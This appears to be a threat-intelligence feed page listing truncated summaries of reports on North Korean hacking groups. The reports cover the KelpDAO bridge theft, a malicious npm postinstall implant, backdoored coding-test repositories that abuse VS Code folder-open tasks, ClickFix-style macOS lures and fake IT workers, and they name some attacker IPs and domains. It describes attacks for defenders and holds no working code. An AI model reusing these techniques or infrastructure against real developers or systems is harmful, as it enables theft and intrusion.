387 reports
Lazarus Group’s TraderTraitor cluster is preliminarily linked to a $292M KelpDAO rsETH bridge exploit that abused a 1-of-1 LayerZero DVN setup rather than a smart contract flaw. The attacker allegedly poisoned RPC infrastructure used by LayerZero’s DVN, f…
Malicious `js-logger-pack` versions used an npm `postinstall` script to download cross-platform `MicrosoftSystem64` Node SEA implants from Hugging Face, giving the operator persistent access on Windows, macOS, and Linux. The implant connects to `195.201.1…
The excerpt traces laundering after a reported North Korean theft of $292 million from Kelp DAO, describing pre-funded Tornado Cash wallets, cross-chain gas preparation, and a forged LayerZero message that released 116,500 rsETH. The actor rapidly convert…
A developer describes a highly polished fake recruiting process that used a realistic company website, apparent HR and engineering interviews, and a coding challenge to persuade the victim to run a supplied repository. The visible repo appeared clean, but…
The archived driver analysis alleges that North Korea’s Lazarus Group has weaponized the same class of Microsoft-signed OEM kernel driver weakness discussed in the post. The cited Dell WDTKernel.sys driver exposes 47 privileged commands without access con…
Attackers linked by LayerZero to DPRK Lazarus Group's TraderTraitor stole about $292 million in rsETH from KelpDAO's LayerZero bridge on April 18, 2026. The operation targeted off-chain verification infrastructure, compromising LayerZero-hosted RPC nodes …
Expel tracks HexagonalRodent as a high-confidence DPRK state-sponsored cluster focused on stealing cryptocurrency and NFTs from Web3 developers. The group uses fake job offers and coding assessments that are backdoored through VSCode tasks.json run-on-fol…
Team Cymru examines infrastructure tied to DPRK-linked fake IT worker activity after ZachXBT connected luckyguys[.]site to related cryptocurrency payments. The domain resolved to 163.245.219[.]19, where network telemetry showed concentrated Astrill, Mullv…
QuillAudits frames Lazarus Group's cryptocurrency theft as an industrialized DPRK state capability, estimating more than $7.5 billion stolen through social engineering, insider-style access, UI poisoning, laundering infrastructure, and off-chain verificat…
Arkham tracked the suspected Lazarus Group-linked KelpDAO attacker moving 76,000 ETH, worth about $175 million, from the $292 million theft into new on-chain addresses. The movement followed containment on Arbitrum, where about $71 million in stolen ETH l…
Breakglass Intelligence attributes 158.247.210.58, a Vultr Seoul VPS, to the same Kimsuky-aligned infrastructure cluster as two previously documented Vultr Seoul systems. Passive DNS showed more than 60 domains over an 18-month window, with 31 still resol…
Trend Micro found Void Dokkaebi, also tracked as Famous Chollima, turning fake recruiter interviews into a worm-like supply chain campaign against software developers. Victims are lured into cloning repositories that abuse VS Code folder-open tasks, and c…
Microsoft describes how Jasper Sleet, a North Korea-aligned fraudulent IT worker operation, exploits remote hiring workflows to gain trusted organizational access. The actors use stolen or fabricated identities, AI-assisted personas, and role-specific app…
ANY.RUN attributes an active ClickFix-style macOS campaign to Lazarus Group, with fake meeting lures delivered through Telegram and impersonated Zoom, Teams, or Google Meet pages. Victims are instructed to run terminal commands that install the Go-based M…
SlowMist frames the Kelp DAO rsETH and LayerZero incident as a cascading DeFi failure involving liquid restaking tokens, cross-chain bridge verification, and lending-protocol collateral assumptions. The interview says LayerZero attributed the attack to La…